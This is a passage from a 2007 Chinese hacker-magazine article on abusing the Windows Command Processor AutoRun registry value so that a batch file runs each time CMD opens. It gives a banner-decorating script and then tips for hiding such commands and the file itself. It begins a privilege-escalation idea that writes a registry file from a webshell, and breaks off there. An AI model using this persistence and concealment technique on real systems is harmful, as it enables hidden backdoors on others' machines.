小心，CMD也闹鬼！

作者：冰的原点
说明：文章已发表于黑客手册07年11期，转载请注明出处！

CMD？大家熟悉吧？我们可以在这里面查看进程，查看端口号，可以干许多的事！可是你有没有想过，当我们打开CMD的瞬间，我们就有可能中了木马或者病毒了！这可不是说的玩的，现在就让我们一起看看就是怎么一回事？

话说回来，这还是我有一回在网上转的时候，看到别人可以用这个方法来装扮你的CMD窗口。当时我就想，既然你可以装扮你的窗口，为什么不能干别的呢？我们开始吧！装扮CMD的方法很简单，就是写一个批处理，内容如下：
@ECHO OFF
cls
echo "++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "+                 冰的原点                            "
echo "+                                                    "
echo "+        我的博客:http://hi.baidu.com/冰的原点        "
echo "+                                                    "
echo "+                                                    "
echo "+             欢迎大家访问                            "
echo "++++++++++++++++++++++++++++++++++++++++++++++++++++"
title 冰的原点
color E
保存为11.bat，随便放在哪个盘里，这里我放在C盘，然后找到注册表，到这个目录下：[HKEY_LOCAL_MACHINESOFTWAREMicrosoftCommand Processor]，在右边出现了一个字符串值：autorun.然后右键修改，在弹出的对话框中填入11.bat的绝对路径。如图1 .然后点击确定。现在我们再到运行里输入CMD试试，会出现这样的画面。如图2. 到这里为止我们美化我们的CMD窗口就完工了，当然这里面的代码大家可以随便改。
说到这里，大家可能已经想到了这篇文章要讲的是什么了。不过，我在做测试的时候，还是遇到些麻烦.我们把原来代码改成这样：start http://www.baidu.com
然后保存。看看会出现什么效果，如图3. 百度是打开了，可CMD窗口下，不是明显的摆着我们的命令么？这个怎么能行，一下子就被看穿了！我们得想想办法把这些命令隐藏起来。对，我们用ECHO OFF 试试！再来看下效果，如图4. 很明显的哦。大家都看到了，我们的11.bat不是很明显的暴露在C盘么？这个很好办，我们把它放得隐藏点就得了，每个盘都有一个Recycled目录，只要我们把它传到这里面来，就会显得隐藏一点。好了，原理就讲到这里了，我们来分析下，这个东东到底可以干什么？

想法一：
提权。曾经我想过用这个方法来用做提权，先在webshell里执行：
ECHO Windows Registry Editor Version 5.00>door.reg
ECHO [